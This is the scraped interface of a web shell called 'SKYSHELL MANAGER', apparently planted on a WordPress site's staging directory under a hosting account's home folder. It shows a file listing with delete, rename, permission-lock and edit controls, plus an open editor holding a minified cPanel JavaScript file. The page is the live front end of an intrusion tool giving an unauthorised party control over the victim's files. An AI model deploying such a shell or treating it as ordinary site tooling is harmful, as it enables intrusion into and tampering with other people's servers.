📁
SKYSHELL MANAGER
PHP v8.2.31
Create
Create
Path:
root
/
home
/
thevaxnx
/
nativize.com
/
staging
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
wp-links-opml.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: tableShowingDirective.min.js
define(["angular","cjt/util/locale","cjt/core"],(function(t,e,i){"use strict";t.module("cpanel.domains.tableShowing.directive",[]).directive("tableShowing",(function(){var t="directives/tableShowingDirective.phtml",n="domains/"+t;return{templateUrl:i.config.debug?i.buildFullPath(n):t,restrict:"EA",scope:{start:"=",limit:"=",total:"="},transclude:!0,controller:["$scope",function(t){t.getShowingText=function(){return e.maketext("Displaying [numf,_1] through [numf,_2] out of [quant,_3,item,items]",t.start,t.limit,t.total)}}]}}))}));
Save